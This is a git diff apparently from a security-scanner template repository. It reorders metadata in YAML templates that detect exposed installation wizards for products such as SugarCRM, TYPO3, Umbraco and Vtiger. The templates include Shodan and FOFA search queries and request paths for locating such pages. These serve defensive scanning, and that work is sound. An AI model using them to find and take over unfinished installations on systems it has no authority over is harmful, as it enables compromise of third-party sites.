@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022064f031391e9c6c891e951110b7f75ed21337e7a8022dd361580d20ee11805d40022100c9ef80338c794a6b3fcad1bd780b60806001a47582fd37a6a8447e86052ebe54:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022064f031391e9c6c891e951110b7f75ed21337e7a8022dd361580d20ee11805d40022100c9ef80338c794a6b3fcad1bd780b60806001a47582fd37a6a8447e86052ebe54:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/sabnzbd-installer.yaml b/http/misconfiguration/installer/sabnzbd-installer.yaml
index 26f29ba9a9..e2039d5ddd 100644
--- a/http/misconfiguration/installer/sabnzbd-installer.yaml
+++ b/http/misconfiguration/installer/sabnzbd-installer.yaml
@@ -8,17 +8,17 @@ info:
Default installation wizard page of SABnzbd was discovered.
reference:
- https://www.sabnzbd.org/
+ classification:
+ cpe: cpe:2.3:a:sabnzbd:sabnzbd:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
+ vendor: sabnzbd
+ product: sabnzbd
shodan-query: html:"SABnzbd Quick-Start Wizard"
fofa-query: body="SABnzbd Quick-Start Wizard"
- product: sabnzbd
- vendor: sabnzbd
tags: sabnzbd,wizard,installer,misconfig
- classification:
- cpe: cpe:2.3:a:sabnzbd:sabnzbd:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -26,6 +26,7 @@ http:
- "{{BaseURL}}/wizard/"
stop-at-first-match: true
+
matchers-condition: and
matchers:
- type: word
@@ -36,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100e0f82c995b6a686d3028d757d7b32b9cfe867077f24b73d12bb70b78cb1f07b1022100d39bd3dfca7af6030eb799c7a3edf07645f7b7f2b2943901ef8a999c2be63e16:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100e0f82c995b6a686d3028d757d7b32b9cfe867077f24b73d12bb70b78cb1f07b1022100d39bd3dfca7af6030eb799c7a3edf07645f7b7f2b2943901ef8a999c2be63e16:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/server-monitor-installer.yaml b/http/misconfiguration/installer/server-monitor-installer.yaml
index 0a1d1f3c20..3161647f45 100644
--- a/http/misconfiguration/installer/server-monitor-installer.yaml
+++ b/http/misconfiguration/installer/server-monitor-installer.yaml
@@ -5,16 +5,16 @@ info:
author: tess
severity: high
description: Server Monitor is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:poweradmin:pa_server_monitor:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"SERVER MONITOR - Install"
- product: pa_server_monitor
vendor: poweradmin
+ product: pa_server_monitor
+ shodan-query: title:"SERVER MONITOR - Install"
tags: misconfig,monitor,exposure,install
- classification:
- cpe: cpe:2.3:a:poweradmin:pa_server_monitor:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -38,4 +38,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502200b7f436c2808b9457a5469cf8930b006f5036ddbbeb702b60e3ef3999214897502210089fb2e4bdeddc5880309778bfe3a18bd092f8eb7dacd6cfac5c30ccad01789ff:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502200b7f436c2808b9457a5469cf8930b006f5036ddbbeb702b60e3ef3999214897502210089fb2e4bdeddc5880309778bfe3a18bd092f8eb7dacd6cfac5c30ccad01789ff:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/setup-github-enterprise.yaml b/http/misconfiguration/installer/setup-github-enterprise.yaml
index ea62462364..5f2a183658 100644
--- a/http/misconfiguration/installer/setup-github-enterprise.yaml
+++ b/http/misconfiguration/installer/setup-github-enterprise.yaml
@@ -4,16 +4,16 @@ info:
name: Setup GitHub Enterprise - Detect
author: tess
severity: unknown
+ classification:
+ cpe: cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.favicon.hash:-1373456171
- product: enterprise_server
vendor: github
+ product: enterprise_server
+ shodan-query: http.favicon.hash:-1373456171
tags: misconfig,installer,github,setup
- classification:
- cpe: cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100911c30fdb8aa2b865bb630663e66aa292b65b0e91a21c955154bf6987844f57c022100a67b5578341817f8a797a7aa42e7da1defe873e526ae86e1556bbce22aaaff10:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100911c30fdb8aa2b865bb630663e66aa292b65b0e91a21c955154bf6987844f57c022100a67b5578341817f8a797a7aa42e7da1defe873e526ae86e1556bbce22aaaff10:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/shopware-installer.yaml b/http/misconfiguration/installer/shopware-installer.yaml
index 3cb835607a..20105f6cbf 100644
--- a/http/misconfiguration/installer/shopware-installer.yaml
+++ b/http/misconfiguration/installer/shopware-installer.yaml
@@ -7,16 +7,16 @@ info:
description: Shopware is susceptible to the Installation page exposure due to misconfiguration.
reference:
- https://www.shopware.com/en/
+ classification:
+ cpe: cpe:2.3:a:shopware:shopware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: title="Installation | Shopware 6"
- product: shopware
vendor: shopware
+ product: shopware
+ fofa-query: title="Installation | Shopware 6"
tags: misconfig,shopware,install,exposure
- classification:
- cpe: cpe:2.3:a:shopware:shopware:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -34,4 +34,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100c49d7dd7b97eb87d5b4de3f9e09232a82505cd82cf325da8d921f8ae060ba4f4022100a7a8fbaacad106a6f9797a34c058e728821f47099467a86276a92d3bc3a55cd1:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100c49d7dd7b97eb87d5b4de3f9e09232a82505cd82cf325da8d921f8ae060ba4f4022100a7a8fbaacad106a6f9797a34c058e728821f47099467a86276a92d3bc3a55cd1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/smf-installer.yaml b/http/misconfiguration/installer/smf-installer.yaml
index 8ba36f3413..ac25d75ec1 100644
--- a/http/misconfiguration/installer/smf-installer.yaml
+++ b/http/misconfiguration/installer/smf-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: SMF is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:simplemachines:simple_machine_forum:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"SMF Installer"
- product: simple_machine_forum
vendor: simplemachines
+ product: simple_machine_forum
+ shodan-query: title:"SMF Installer"
tags: misconfig,smf,install,exposure
- classification:
- cpe: cpe:2.3:a:simplemachines:simple_machine_forum:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 490a004630440220208d7404afcad5ede18fa45f5353583c132e2a86b100143fbe92f1ea44e4e2e0022057ca90a574c898e061c684a87d1e98d09c274353490e4fce4e4fc597ff7edc69:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a004630440220208d7404afcad5ede18fa45f5353583c132e2a86b100143fbe92f1ea44e4e2e0022057ca90a574c898e061c684a87d1e98d09c274353490e4fce4e4fc597ff7edc69:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/snipe-it-installer.yaml b/http/misconfiguration/installer/snipe-it-installer.yaml
index 12d0bf6411..ebcad22a6c 100644
--- a/http/misconfiguration/installer/snipe-it-installer.yaml
+++ b/http/misconfiguration/installer/snipe-it-installer.yaml
@@ -8,16 +8,16 @@ info:
Detects exposed Snipe-IT Setup page.
reference:
- https://snipeitapp.com/
+ classification:
+ cpe: cpe:2.3:a:snipeitapp:snipe-it:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Snipe-IT Setup"
- product: snipe-it
vendor: snipeitapp
+ product: snipe-it
+ shodan-query: html:"Snipe-IT Setup"
tags: misconfig,install,exposure,snipe-it
- classification:
- cpe: cpe:2.3:a:snipeitapp:snipe-it:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,5 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402207a3b4baa4a918064800581dcaff661d882f28a67664025f3e136be3ee66a483c02201bb5a2fcba8eecf549d033d9a21eff12e0c39818f512ba9b7ecb543528686116:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402207a3b4baa4a918064800581dcaff661d882f28a67664025f3e136be3ee66a483c02201bb5a2fcba8eecf549d033d9a21eff12e0c39818f512ba9b7ecb543528686116:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/spa-cart-installer.yaml b/http/misconfiguration/installer/spa-cart-installer.yaml
index 13ffd09108..3e76dd44c4 100644
--- a/http/misconfiguration/installer/spa-cart-installer.yaml
+++ b/http/misconfiguration/installer/spa-cart-installer.yaml
@@ -7,15 +7,15 @@ info:
description: SPA Cart installer was found.
reference:
- https://spa-cart.com/
- metadata:
- max-request: 1
- fofa-query: title="SPA Cart Installation"
- product: spa-cart
- vendor: spa-cart
- tags: spa-cart,exposure,installer,misconfig
-
classification:
cpe: cpe:2.3:a:spa-cart:spa-cart:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: spa-cart
+ product: spa-cart
+ fofa-query: title="SPA Cart Installation"
+ tags: spa-cart,exposure,installer,misconfig
+
http:
- method: GET
path:
@@ -33,4 +33,4 @@ http:
status:
- 200
-# digest: 4a0a00473045022100c09a075668a57e2d44045c4514e35e620d873c092058b30c3a1e02328aa2406802201c2d079dca0ab6762bee18dc881e0c9a434ada56ebf406148800a2639d1a6c46:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100c09a075668a57e2d44045c4514e35e620d873c092058b30c3a1e02328aa2406802201c2d079dca0ab6762bee18dc881e0c9a434ada56ebf406148800a2639d1a6c46:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/subrion-installer.yaml b/http/misconfiguration/installer/subrion-installer.yaml
index e7c5886539..9ad4bba51c 100644
--- a/http/misconfiguration/installer/subrion-installer.yaml
+++ b/http/misconfiguration/installer/subrion-installer.yaml
@@ -8,16 +8,16 @@ info:
Subrion CMS Web Installer has been exposed.
reference:
- https://github.com/intelliants/subrion
+ classification:
+ cpe: cpe:2.3:a:intelliants:subrion:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: title="Subrion CMS Web Installer"
- product: subrion
vendor: intelliants
+ product: subrion
+ fofa-query: title="Subrion CMS Web Installer"
tags: subrion,cms,install,misconfig
- classification:
- cpe: cpe:2.3:a:intelliants:subrion:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100c21c25939a762dba12a071f9f6000af22a6b8640ceae95652a27810df62cb5850221009e24a5b294bc966e32cfda4cc151aaa159d927756b0d610b0933fa147e2832ea:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100c21c25939a762dba12a071f9f6000af22a6b8640ceae95652a27810df62cb5850221009e24a5b294bc966e32cfda4cc151aaa159d927756b0d610b0933fa147e2832ea:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/sugarcrm-install.yaml b/http/misconfiguration/installer/sugarcrm-install.yaml
index 996a7ddb96..e394f2a73f 100644
--- a/http/misconfiguration/installer/sugarcrm-install.yaml
+++ b/http/misconfiguration/installer/sugarcrm-install.yaml
@@ -5,16 +5,16 @@ info:
author: ritikchaddha
severity: high
description: SugarCRM is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:sugarcrm:sugarcrm:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Sugar Setup Wizard"
- product: sugarcrm
vendor: sugarcrm
+ product: sugarcrm
+ shodan-query: title:"Sugar Setup Wizard"
tags: misconfig,sugar,sugarcrm,install
- classification:
- cpe: cpe:2.3:a:sugarcrm:sugarcrm:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -30,4 +30,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502204aa5775363df16fcc9b7177b7e5535656387f69878298b7114308780795e43fb022100e3cc8bd09ff81291094aecb1097c7e2ae8d418f78225929896f5917f23a5fdc4:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502204aa5775363df16fcc9b7177b7e5535656387f69878298b7114308780795e43fb022100e3cc8bd09ff81291094aecb1097c7e2ae8d418f78225929896f5917f23a5fdc4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/suitecrm-installer.yaml b/http/misconfiguration/installer/suitecrm-installer.yaml
index 5aebcf0511..b5dd34ea74 100644
--- a/http/misconfiguration/installer/suitecrm-installer.yaml
+++ b/http/misconfiguration/installer/suitecrm-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: SuiteCRM is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"SuiteCRM"
- product: suitecrm
vendor: salesagility
+ product: suitecrm
+ shodan-query: title:"SuiteCRM"
tags: misconfig,suitecrm,install
- classification:
- cpe: cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100cba48866ad1b5132d0f306077db31f4c2b1444727f506cc2560f848f9149db0a0220051ea86c09ac1bac18920cbc53c7b8cc59e604ca67f3d4f7c6ce53e75af8c0d9:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100cba48866ad1b5132d0f306077db31f4c2b1444727f506cc2560f848f9149db0a0220051ea86c09ac1bac18920cbc53c7b8cc59e604ca67f3d4f7c6ce53e75af8c0d9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/tasmota-install.yaml b/http/misconfiguration/installer/tasmota-install.yaml
index 0077e8d9c6..9d52ff4e07 100644
--- a/http/misconfiguration/installer/tasmota-install.yaml
+++ b/http/misconfiguration/installer/tasmota-install.yaml
@@ -5,16 +5,16 @@ info:
author: ritikchaddha
severity: high
description: Tasmota is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:o:tasmota_project:tasmota:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Tasmota"
- product: tasmota
vendor: tasmota_project
+ product: tasmota
+ shodan-query: title:"Tasmota"
tags: misconfig,tasmota,install,exposure
- classification:
- cpe: cpe:2.3:o:tasmota_project:tasmota:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022019eb38378f3d40f8a2f71fe25698efcee2357dec42b9514d95569c4fededa82a022100c812c07241e7e713db02ddaee366af9cb5670963e643898126265238791ead54:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022019eb38378f3d40f8a2f71fe25698efcee2357dec42b9514d95569c4fededa82a022100c812c07241e7e713db02ddaee366af9cb5670963e643898126265238791ead54:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/tastyigniter-installer.yaml b/http/misconfiguration/installer/tastyigniter-installer.yaml
index 711dd56277..54712e9c72 100644
--- a/http/misconfiguration/installer/tastyigniter-installer.yaml
+++ b/http/misconfiguration/installer/tastyigniter-installer.yaml
@@ -8,16 +8,16 @@ info:
Detects exposed TastyIgniter Setup page.
reference:
- https://tastyigniter.com/
+ classification:
+ cpe: cpe:2.3:a:tastyigniter:tastyigniter:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- fofa-query: body="TastyIgniter - Setup - License agreement"
- product: tastyigniter
vendor: tastyigniter
+ product: tastyigniter
+ fofa-query: body="TastyIgniter - Setup - License agreement"
tags: misconfig,install,exposure,tastyigniter
- classification:
- cpe: cpe:2.3:a:tastyigniter:tastyigniter:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022039e2c4807f395e7435256b8058fadc16da77b4dff33061231baa9c4437b7cdf502203554057a981d56294d48f2244347267d8a5a8c677743a75ca434209388fd7ce6:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022039e2c4807f395e7435256b8058fadc16da77b4dff33061231baa9c4437b7cdf502203554057a981d56294d48f2244347267d8a5a8c677743a75ca434209388fd7ce6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/tautulli-install.yaml b/http/misconfiguration/installer/tautulli-install.yaml
index e40383362d..3878546321 100644
--- a/http/misconfiguration/installer/tautulli-install.yaml
+++ b/http/misconfiguration/installer/tautulli-install.yaml
@@ -5,16 +5,16 @@ info:
author: ritikchaddha
severity: high
description: Tautulli is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:tautulli:tautulli:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Tautulli - Welcome"
- product: tautulli
vendor: tautulli
+ product: tautulli
+ shodan-query: title:"Tautulli - Welcome"
tags: misconfig,tautulli,install
- classification:
- cpe: cpe:2.3:a:tautulli:tautulli:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100bfe29789f1c1752dab4a78bca7cd9aa515a3650baa916d8e4588bdcacd0476ea022018454d3ca30b089180fc1abadcc3490ed3cf0092caa9b50d62472e88792e1211:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100bfe29789f1c1752dab4a78bca7cd9aa515a3650baa916d8e4588bdcacd0476ea022018454d3ca30b089180fc1abadcc3490ed3cf0092caa9b50d62472e88792e1211:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/testrail-install.yaml b/http/misconfiguration/installer/testrail-install.yaml
index d342672e85..8f77e56047 100644
--- a/http/misconfiguration/installer/testrail-install.yaml
+++ b/http/misconfiguration/installer/testrail-install.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: TestRail is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:gurock:testrail:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"TestRail Installation Wizard"
- product: testrail
vendor: gurock
+ product: testrail
+ shodan-query: title:"TestRail Installation Wizard"
tags: misconfig,testrail,install,exposure
- classification:
- cpe: cpe:2.3:a:gurock:testrail:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -30,4 +30,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a004830460221009dea75a2e3208eef747084522cafdcffc7d9f7e4044f85e971eb04eba0e3abc8022100cb3d62958931d47e671428b921db2276c50a03bdff03724413d1ad3900f402d6:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a004830460221009dea75a2e3208eef747084522cafdcffc7d9f7e4044f85e971eb04eba0e3abc8022100cb3d62958931d47e671428b921db2276c50a03bdff03724413d1ad3900f402d6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/tiny-rss-installer.yaml b/http/misconfiguration/installer/tiny-rss-installer.yaml
index 9bab296958..eadb63789b 100644
--- a/http/misconfiguration/installer/tiny-rss-installer.yaml
+++ b/http/misconfiguration/installer/tiny-rss-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: Tiny Tiny RSS is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:tt-rss:tiny_tiny_rss:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Tiny Tiny RSS - Installer"
- product: tiny_tiny_rss
vendor: tt-rss
+ product: tiny_tiny_rss
+ shodan-query: title:"Tiny Tiny RSS - Installer"
tags: misconfig,tiny,install
- classification:
- cpe: cpe:2.3:a:tt-rss:tiny_tiny_rss:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502210083b4a48cf305430a1d931083d367431cce419d274f67aea43aed3defd301a6b602202cfdbc94460a8808da4f9f12d6186890f744e7bb9f1164a7ea1ad2aa978bc16b:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502210083b4a48cf305430a1d931083d367431cce419d274f67aea43aed3defd301a6b602202cfdbc94460a8808da4f9f12d6186890f744e7bb9f1164a7ea1ad2aa978bc16b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/typo3-installer.yaml b/http/misconfiguration/installer/typo3-installer.yaml
index e3332ee2b9..e23e1890bd 100644
--- a/http/misconfiguration/installer/typo3-installer.yaml
+++ b/http/misconfiguration/installer/typo3-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: medium
description: TYPO3 is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:typo3:typo3:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Installing TYPO3 CMS"
- product: typo3
vendor: typo3
+ product: typo3
+ shodan-query: title:"Installing TYPO3 CMS"
tags: misconfig,typo3,install
- classification:
- cpe: cpe:2.3:a:typo3:typo3:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100efd5f0fd8174dcdfabaeb45938fc7493c95d86575274608f4c49af7dd10c7cf80220775bef7143126cf51c75dc54c56263660355c29c74f47096f13a927d98a85137:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100efd5f0fd8174dcdfabaeb45938fc7493c95d86575274608f4c49af7dd10c7cf80220775bef7143126cf51c75dc54c56263660355c29c74f47096f13a927d98a85137:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/umbraco-installer.yaml b/http/misconfiguration/installer/umbraco-installer.yaml
index e4fafb4c22..dc0843544e 100644
--- a/http/misconfiguration/installer/umbraco-installer.yaml
+++ b/http/misconfiguration/installer/umbraco-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: Umbraco is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:umbraco:umbraco_cms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Install Umbraco"
- product: umbraco_cms
vendor: umbraco
+ product: umbraco_cms
+ shodan-query: title:"Install Umbraco"
tags: misconfig,umbraco,install,oss
- classification:
- cpe: cpe:2.3:a:umbraco:umbraco_cms:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022032b0bc5610244cedb9e0325b0573874483c3a3e856b5a2c4c51bfee23200130e022100d4ecf854bfc3ca2eab1bf51ee9ee22b9b8780857ec2029498906714160b0c73f:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022032b0bc5610244cedb9e0325b0573874483c3a3e856b5a2c4c51bfee23200130e022100d4ecf854bfc3ca2eab1bf51ee9ee22b9b8780857ec2029498906714160b0c73f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/uvdesk-install.yaml b/http/misconfiguration/installer/uvdesk-install.yaml
index 8ce531700d..e7b9f3997e 100644
--- a/http/misconfiguration/installer/uvdesk-install.yaml
+++ b/http/misconfiguration/installer/uvdesk-install.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: UVDesk is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:webkul:uvdesk:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"UVDesk Helpdesk Community Edition - Installation Wizard"
- product: uvdesk
vendor: webkul
+ product: uvdesk
+ shodan-query: title:"UVDesk Helpdesk Community Edition - Installation Wizard"
tags: misconfig,uvdesk,install,exposure
- classification:
- cpe: cpe:2.3:a:webkul:uvdesk:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100e1f12603d91b43f7731f4e4d81cfaca7e81ccef5ff3b0ac18d009b55798d277a02204d7c4b68e0cc83d213100bf2aa764e6594f5e371785d8209bbe03ae08c4d7125:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100e1f12603d91b43f7731f4e4d81cfaca7e81ccef5ff3b0ac18d009b55798d277a02204d7c4b68e0cc83d213100bf2aa764e6594f5e371785d8209bbe03ae08c4d7125:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/vtiger-installer.yaml b/http/misconfiguration/installer/vtiger-installer.yaml
index d8d4f1a88d..0fd991ad55 100644
--- a/http/misconfiguration/installer/vtiger-installer.yaml
+++ b/http/misconfiguration/installer/vtiger-installer.yaml
@@ -5,16 +5,16 @@ info:
author: DhiyaneshDk
severity: high
description: Vtiger CRM is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:vtiger:vtiger_crm:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Welcome to Vtiger CRM"
- product: vtiger_crm
vendor: vtiger
+ product: vtiger_crm
+ shodan-query: html:"Welcome to Vtiger CRM"
tags: misconfig,vtiger,install,exposure
- classification:
- cpe: cpe:2.3:a:vtiger:vtiger_crm:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100c9c91176323bd2f659199390d1b9d04de5cfcb822de5e67ef6f6f530e76d942f022100b3fef7b12c6c49eccd6570e1d7e5872ee03f114bc79cdb5a56a4ced69877d4f4:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100c9c91176323bd2f659199390d1b9d04de5cfcb822de5e67ef6f6f530e76d942f022100b3fef7b12c6c49eccd6570e1d7e5872ee03f114bc79cdb5a56a4ced69877d4f4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/webcalendar-install.yaml b/http/misconfiguration/installer/webcalendar-install.yaml
index 9f66521dd7..7c08c07c12 100644
--- a/http/misconfiguration/installer/webcalendar-install.yaml
+++ b/http/misconfiguration/installer/webcalendar-install.yaml
@@ -5,17 +5,17 @@ info:
author: ritikchaddha
severity: high
description: WebCalendar is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:k5n:webcalendar:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: k5n
+ product: webcalendar
shodan-query: title:"WebCalendar Setup Wizard"
fofa-query: title="WebCalendar Setup Wizard"
- product: webcalendar
- vendor: k5n
tags: misconfig,webcalendar,install
- classification:
- cpe: cpe:2.3:a:k5n:webcalendar:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502203f9f9d0530a6128882d754e1bf7bdf02d01b355f189a08b28daeb95a1f748c71022100cef8e90c908df68dc0f8289901f9eca3896612e38649ba5edf5058132bce0b5f:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502203f9f9d0530a6128882d754e1bf7bdf02d01b355f189a08b28daeb95a1f748c71022100cef8e90c908df68dc0f8289901f9eca3896612e38649ba5edf5058132bce0b5f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/installer/webtrees-install.yaml b/http/misconfiguration/installer/webtrees-install.yaml
index 471ae52d4a..af1ad6c99b 100644
--- a/http/misconfiguration/installer/webtrees-install.yaml
+++ b/http/misconfiguration/installer/webtrees-install.yaml
@@ -5,16 +5,16 @@ info:
author: ritikchaddha
severity: high
description: WebTrees is susceptible to the Installation page exposure due to misconfiguration.
+ classification:
+ cpe: cpe:2.3:a:webtrees:webtrees:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Setup wizard for webtrees"
- product: webtrees
vendor: webtrees
+ product: webtrees
+ shodan-query: title:"Setup wizard for webtrees"
tags: misconfig,webtrees,install
- classification:
- cpe: cpe:2.3:a:webtrees:webtrees:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -29,4 +29,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100ec41f6f8796153193b35d05f3bdb9b2581179314fc51bc115841bc202321b4ac022100beb0f0741344f7edbd03b32d0fac505b69af2fdb31f5d50a2819191aa8ad8725:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100ec41f6f8796153193b35d05f3bdb9b2581179314fc51bc115841bc202321b4ac022100beb0f0741344f7edbd03b32d0fac505b69af2fdb31f5d50a2819191aa8ad8725:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
